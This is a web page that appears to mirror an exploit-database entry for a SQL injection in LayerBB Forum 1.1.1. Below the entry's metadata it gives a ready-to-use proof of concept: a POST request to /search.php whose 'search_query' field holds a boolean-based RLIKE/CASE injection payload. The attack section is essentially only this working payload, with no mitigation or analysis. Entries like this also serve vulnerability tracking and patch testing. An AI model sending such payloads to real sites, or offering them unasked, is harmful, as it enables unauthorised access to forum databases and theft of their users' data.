[] NeoSense
E X P L O I T S
title author type platform port cve id

LayerBB Forum 1.1.1 - 'search_query' SQL Injection

Author: Ihsan Sencan
type: webapps
platform: php
port: 
date_added: 2018-10-04 
date_updated: 2019-01-07 
verified: 0 
codes:  
tags: SQL Injection (SQLi)
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comLayerBB-1.1.1.tar.gz
# Exploit Title: LayerBB Forum 1.1.1 - 'search_query' SQL Injection
# Exploit Author: Ihsan Sencan
# Dork: N/A
# Date: 2018-10-04
# Vendor Homepage: https://layerbb.com/
# Software Link: https://demo.layerbb.com/
# Version: 1.1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC:
# 1)
# POST /search.php HTTP/1.1
# Host: Target

search_query=S' RLIKE (SELECT (CASE WHEN (111=111) THEN 0x73 ELSE 0x28 END)) AND 'X'='X&search_submit=Search
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.